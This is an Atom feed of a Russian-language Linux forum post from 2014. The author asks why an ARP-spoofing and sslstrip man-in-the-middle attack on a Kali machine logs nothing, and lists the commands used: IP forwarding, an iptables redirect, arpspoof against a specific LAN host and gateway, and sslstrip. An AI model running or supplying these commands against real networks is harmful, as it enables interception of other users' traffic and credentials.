<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
	<title type="html"><![CDATA[Linux Forum &mdash; Kali linux arp spoofing]]></title>
	<link rel="self" href="https://linuxforum.ru/extern.php?action=feed&amp;tid=36728&amp;type=atom" />
	<updated>2014-11-13T16:26:39Z</updated>
	<generator>PunBB</generator>
	<id>https://linuxforum.ru/viewtopic.php?id=36728</id>
		<entry>
			<title type="html"><![CDATA[Kali linux arp spoofing]]></title>
			<link rel="alternate" href="https://linuxforum.ru/viewtopic.php?pid=430932#p430932" />
			<content type="html"><![CDATA[<p>Логов вобще нет,кстати сайты всё равно переходят на https я слышал что долны переходить на http.<br />Список команд которые я пишу.<br /></p><div class="codebox"><pre><code>echo 1 &gt; /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t 192.168.0.107 192.168.0.1
sslstrip -l 8080
cat sslstrip.log</code></pre></div>]]></content>
			<author>
				<name><![CDATA[Lost]]></name>
				<uri>https://linuxforum.ru/profile.php?id=34515</uri>
			</author>
			<updated>2014-11-13T16:26:39Z</updated>
			<id>https://linuxforum.ru/viewtopic.php?pid=430932#p430932</id>
		</entry>
</feed>
